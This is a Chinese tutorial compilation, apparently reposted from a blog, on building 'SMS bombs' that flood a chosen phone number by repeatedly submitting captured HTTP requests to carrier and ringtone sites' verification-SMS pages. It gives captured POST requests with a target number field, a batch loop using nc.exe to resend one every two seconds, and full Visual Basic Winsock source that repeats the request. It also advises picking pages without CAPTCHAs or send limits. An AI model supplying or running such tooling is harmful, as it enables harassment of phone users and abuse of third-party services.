关于手机短信轰炸接口的制作

手机短信炸弹的制作 要著作短信炸弹，就要知道短信炸弹的原理，其实很简单， 就是某些用手机扣费的网站在你付费钱会发送一条短信到你手机上确认 你把确认码在网站上回复以便完成付费 等。。。 如果你填了别的号码 网站就会发到别的号码上 你不停填写 网站就不手机短信炸弹的制作

要著作短信炸弹，就要知道短信炸弹的原理，其实很简单，
就是某些用手机扣费的网站在你付费钱会发送一条短信到你手机上确认
你把确认码在网站上回复以便完成付费 等。。。
如果你填了别的号码 网站就会发到别的号码上 你不停填写 网站就不停发送
以次来阻碍对方接受短信息
不过现在很多网站都限制了
需要制作软件在不同网站自动填写
现在就开始吧，
首先，我们找个这样的网站吧，我是移动的，就找移动公司吧
我们通常找的是忘记密码，

找到了，但是，大家发现没，这个地方要求我们输入身份正号和验证吗？但我们并不知道身份正啊，看来地方的管理不同，我们还是另找目标吧，（有的地方办理手机号不用身份真的）
找到了一个，但是有验证码，也不能用，呵呵，为了教大家技术，就吧他当作没有的把（大家自己去找没有验证码的，联通

的）
现在我们打开抓包工具，抓取网页数据，打开抓包工具，选择打开文件，就会看到，

我们打开IEXPLORE.EXE这一向。（因为我们要抓的就是我们刚刚在网上运行的数据）这时，属于监视状态，我们打开刚才找到的要添号码的网页，添入手机号，电击确认，

这时抓包已经抓到数据了，但数据很多，我们只要POST 这一个，下面是我抓到的数据

POST /register/reg02.aspx?Type=TX&Id=29986&a=100000&b=1&c= HTTP/1.1Accept: */*Referer: http://219.238.238.180/register/reg01.aspx?Type=TX&Id=29986&a=100000&b=1&c=Accept-Language: zh-cnContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)Host: 219.238.238.180Content-Length: 20Connection: Keep-AliveCache-Control: no-cacheCookie: ASP.NET_SessionId=f50gmo555xk5u245v0d5f2mvmobileNo=13489520365

我们现在就开始利用这写数据制作把，我们现在新建一个记事本，把刚才抓到的数据复制到你面去，
现在去下载一个nc.exe来提交我们的数据，再建一个文件，

输入:go
nc.exe -w 2 219.238.238.180 80<2.txt
goto go

219.238.238.180 是刚才网站的ip 如果不是ip我们还得在提示付中ping出ip （在开始中 运行 cmd打开提示符窗口输入ipconfig +网址，就可以得到ip了）这句话意思是用nc,exe每两秒提交2。txt中的数据到219.238.238.180

现在将这个文件改后缀名为bat
然后我们就可以运行这个bat文件了，现在，对方就会每两秒收到一条短信了。
我们也可以改一下手机号，想对谁进行攻击都行，不过可别太过分，手机也会爆炸的，
这里还要注意的是，我们选择的网站要没有要求输入其他数据的，比如验证吗，身份证只类的，（验证码每字多是不一样的，—）有的网站对发送到同一手机号的短信是有限制的，所以，看你运气了，
好了文章就写到这，希望大家，好好学习。

自己做下沙发.看到有这个
手机炸弹，对我来说已经不陌生了，因为这是第二次接触了。第一次，是朋友倾城，用汇编写了一个。当时也想模仿他用C#写一个出来。不过到网上搜了下资料，找了百度，找了谷歌，资料都很少，并且还很难。因为要从电脑向手机发短信，不仅要找接口，而且还有遵循一定的指令。看了没两天，我就放弃了。
这一次，我想，虽然朋友是用汇编写了，但是原理应该差不多吧。如果能把他的资料拿过来借鉴一下，学习学习下流程，也就够了。不过，我的这位朋友也真够意思，把原理都告诉我了，开始我吓了一跳，因为他用的方法非常简单，根本不需要自己写发信程序，只需要借助别人的力量就够了，可以称的上是借刀杀人！~(我算是服了！~)
在网上我们经常会找到一些网站，例如彩铃的，会让你输入手机号，和验证码，这就好比是别人的刀，就看我们会不会用了。
既然知道了原理，那么程序也就应该成形了！~~~

我先说下攻击效果，如果程序做出来，就会给指定的手机号发短信，发多少条，那由自己定。如果一个手机能接100条。我们给它发200条，那会是一个什么效果呢！~做这个程序也就为了娱乐+学习。没别的想法，所以请大家不要误会。(本次作品支持移动和联通)
现在我们就分析下，如何来做这个攻击程序。既然是向服务器发送请求的，那肯定要用上WebClinet这个类了。但是我们又如何知道提交的URL呢？这些网站不可直接把URL显示给我们看吧。他不给我们看，我们也有办法。抄家伙--抓包工具，抓取它网站提交的URL

有了URL那提交不就简单了。用POST提交还是GET提交，那随你的便喽！~
我在网上分别把POST和GET提交方法down了一份，给大家参考一下(不过我还是用的GET方法，简单嘛！~)。
GET方法

POST方法

想要得到他的验证码图片，也很简单，看源码也可以，或者点右键查看属性。
现在问题来了。如何将验证码显示到我们的程序里面呢。其实也不难，HttpRequest提交过去不是会得到一个响应(HttpResponse)，根据这个我们可以得到响应流，有了流，一个图片不出来了。
Stream newstream = webRespon.GetResponseStream();
pic1.Image = Image.FromStream(newstream);
上面的是问题的，不是问题的都不是很难，难的就在于有的网站，在提交的时候需要经过COOKIE验证的。就这个问题，把我整的够呛。
按照我的思路，我可以先从获取图片那里得到一个COOKIE，然后在提交的受仍然时候这个COOKIE，这样的思路是很符合常理的。可我提交后，总是失败。所以我每次在提交的的数据时，都抓包，就是想和网站上做个对比。我做的唯一和网站有差别的是，我第一次提交，没有COOKIE，而第二次甚至以后就都有了，虽然COOKIE有了，但是，还不成功！~这可把我急坏了，到嘴边的肉，难道就吃不上了。没办法，网上去搜索关于获取COOKIE的资料。可搜了半天，要么是给COOKIE直接赋值，要么还是在HttpResponse里面取。可我用的就是第二种方法啊，不成功啊！~
休息了一会，继续研究，仔细想想。
1.我是能取到COOKIE的，但是与人家的不匹配。
2.我在抓包的时候，在提交的过程中抓到的COOKIE，并不是在返回的时候抓到的COOKIE。而我现在是在返回结果中取COOKIE。
所以我就试验，在提交中的时候取，看能不能取到COOKIE值。经过多次试验，功夫不负有心人，终于取到了。来看看我是怎么取到的。
requestImg.CookieContainer = cc;
cc = requestImg.CookieContainer;
先把空的cc(CookieContainer)给requestImg，然后在把request中的Cook给cc。说真的，我现在都不知道怎么回事。要我想，空值给空值，还等于空值，为什么最后cc里面就有值了。我真想不通，如果有高手知道的话，还请指点一下！~
虽然还没闹清楚cc是怎么有值的。不过还算把这个程序做出来了。先把这段记下来吧，也许以后会理解的！~曾经有人对我说过这样的一段话：“不要问为什么，你给我记住就行了！~”，哎，看来有时候就得这样！~
这个程序虽然原理简单，不过还是细节上花了不少时间(2天时间)。看来方法还是要多积累，思路还是要多扩充的啊！多听听朋友的想法和意见，何尝不是一种享受，哈哈~

刚刚拿到一段代码，是手机炸弹，采用VB写的
为了方便看下面的源代码，界面中对应的控件分别是：手机号码输入部分对应的是Text1,攻击次数输入部分对应的是Text2,开始按钮对应的是Command1,停止按钮对应的是Command2.状态信息显示为Label3.下面我们来看看程序的源码吧

Option ExplicitDim info1 As StringDim a As IntegerDim j As IntegerPrivate Sub Command1_Click()a = Val(Text2.Text)‘获取攻击次数info1 = ""‘我们要发送的数据包，在未发送时为空Winsock1.CloseWinsock1.RemoteHost = "coloring.135-139.com"‘主机地址，可以从数据包中的host读出Winsock1.RemotePort = 80‘端口地址Winsock1.Connectdelay 5000‘延时函数End SubPrivate Sub Command2_Click()EndEnd SubPrivate Sub Winsock1_Connect()Me.Command1.Enabled = False‘在发送数据时，将开始按钮变灰On Error Resume Next‘以下就是我们要发送的数据包内容，只需将我们所抓包的内容一条条输入就可以了info1 = info1 + "POST /CRBT_NEW/servlet/ControlerServlet/CRBTPswd/Get HTTP/1.1" + vbCrLfinfo1 = info1 + "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*" + vbCrLfinfo1 = info1 + "Referer: http://coloring.135-139.com/CRBT_NEW/jsp/PswdQuery.jsp"+ vbCrLfinfo1 = info1 + "Accept-Language: zh-cn" + vbCrLfinfo1 = info1 + "Content-Type: application/x-www-form-urlencoded" + vbCrLfinfo1 = info1 + "UA-CPU: x86" + vbCrLfinfo1 = info1 + "Accept-Encoding: gzip, deflate" + vbCrLfinfo1 = info1 + "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" + vbCrLfinfo1 = info1 + "Host: coloring.135-139.com" + vbCrLfinfo1 = info1 + "Content-Length: 43" + vbCrLfinfo1 = info1 + "Connection: Keep-Alive" + vbCrLfinfo1 = info1 + "Cache-Control: no-cache" + vbCrLfinfo1 = info1 + "Cookie: JSESSIONID=027A62C98B6E6D92ABE33154788CEEB3" + vbCrLfinfo1 = info1 + vbCrLfinfo1 = info1 + "ph&Submit=%CC%E1%BD%BB" + vbCrLfFor j = 1 To a‘循环发送Winsock1.SendData info1‘发送数据Me.Label3.Caption = "短信正在发送中……"‘状态显示delay 5000NextMe.Label3.Caption = "短信已经发送完成"Me.Command1.Enabled = TrueMe.Command1.Caption = "开始"End SubSub delay(t As Long)‘自己定义的一个延时函数，以保证我们发送的数据都会被服务器接收到Dim i As LongFor i = 0 To tDoEventsNextEnd Sub

代码就是这么简单，关键部分作了注释，问题出来了，我们应该怎么办？

看过了06.08的“菜鸟也做短信炸弹”，觉得思路独到，原作者利用的是HTML构造表单，然后利用网站发信页面，实现无限循环提交。这样就弥补了网上一些“手机炸弹”类似程序的不足，一但发现网站发信页面失效了，可以直接修改链接，实现永不失效的效果。有些东西其实就是那么简单的原理，看你会不会去想了。
看过文章后，了解了简单的原理，忽然有一个想法，HTML构造表单能实现“信息炸弹”的效果，那么我用批处理写出来会不会达到同样的效果，经过测试，发现批处理也可以实现同样的效果。
随便找一个http://u.5ku.com，是个彩信、铃声下载站，并且在给手机发送信息的时候也无需验证码，（如图1）

就用这个吧！和原文同样的原理，用WSockExpert抓包分析数据，这里我就不罗嗦了，不会的看上期文章。
首先我们先新建一个1.txt文本文档，写入关键代码（这里我构造好了）：
------------------------------------------------------------------------------------------------------------------------------------------

POST /register/reg02.aspx?Type=TX&Id=23441&a=200323&b=1&c=1 HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*Referer: http://www.hl.chinamobile.com/hlPortalWebApp/com/hlcm2/clt/jpf/slfsvc/usrreg_15/ActS32601_1.do?mmstype=4&mmsid=35588&uid=16068&a=&b=&c=&d=&e=&f=&g=Accept-Language: zh-cnContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: u.5ku.comContent-Length: 20Connection: Keep-AliveCache-Control: no-cacheCookie: ASP.NET_SessionId=paml2n45eitn5qvd2uz5nkv5mobileNo=13*********------------------------------------------------------------------------------------------------------------------------------------------需要解释的是：http://www.hl.chinamobile.com/hlPortalWebApp/com/hlcm2/clt/jpf/slfsvc/usrreg_15/ActS32601_1.do?mmstype=4&mmsid=35588&uid=16068&a=&b=&c=&d=&e=&f=&g=这个是我修改的，为什么？这个地址比较权威，中国移动通信用户注册页面，大家可以随便自己修改，这个地址的页面（如图2），看到了吧！也没有验证码限制，并且速度爆快（大家在找页面的时候一定不要找有验证码的哦），还有在修改的时候要注意，有的彩信下载网站有次数限制，有一次我手机受到一个垃圾信息，就想玩他一下，后来我发现发了几条之后，就不能发送了，因为有发送次数限制的嘛，所以大家在使用的时候找一些无限制的网站页面。mobileNo=13*********这个不用说了，写你要炸的手机号，其他信息都是抓包分析到的。我们总要实现循环提交的吧，我们用NC（地球人都知道），然后再写一个批处理，方法如下：新建一个文本文档，然后写入：------------------------------------------------------------------------------------------------------------------------------------------:gonc.exe -w 2 219.238.238.180 80<1.txtgoto go

------------------------------------------------------------------------------------------------------------------------------------------
NC的-w参数就是timeout的时间，219.238.238.180是彩信网站的IP，然后指向一下我们刚才建立的1.txt，最后保存为BAT批处理。现在一个批处理信息炸弹就完成了，（如图3）

然后我们如何使用呢？首先在1.txt里把mobileNo=13*********修改成你要炸的手机号，把NC打开，然后再打开手机炸弹.BAT（如图4）。

HOHO！然后最小化玩别的去吧！
本文到这里就结束了，就目前来说，这样的信息炸弹对用户来说还没有什么好的防范方法，大家一定要小心警惕，不要把自己的手机号随意透露

转载自Dusk'sblog